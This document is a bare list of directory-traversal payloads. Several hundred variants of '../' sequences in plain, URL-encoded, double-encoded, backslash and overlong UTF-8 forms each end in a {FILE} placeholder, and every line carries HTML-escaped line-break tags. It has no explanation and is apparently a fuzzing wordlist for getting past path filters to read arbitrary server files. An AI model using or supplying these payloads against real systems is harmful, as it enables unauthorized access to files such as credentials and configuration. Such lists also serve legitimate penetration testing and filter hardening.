%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
..%252f{FILE}&lt;br /&gt;
..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\{FILE}&lt;br /&gt;
..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..%255c{FILE}&lt;br /&gt;
..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
../{FILE}&lt;br /&gt;
../../{FILE}&lt;br /&gt;
../../../{FILE}&lt;br /&gt;
../../../../{FILE}&lt;br /&gt;
../../../../../{FILE}&lt;br /&gt;
../../../../../../{FILE}&lt;br /&gt;
../../../../../../../{FILE}&lt;br /&gt;
../../../../../../../../{FILE}&lt;br /&gt;
..%2f{FILE}&lt;br /&gt;
..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
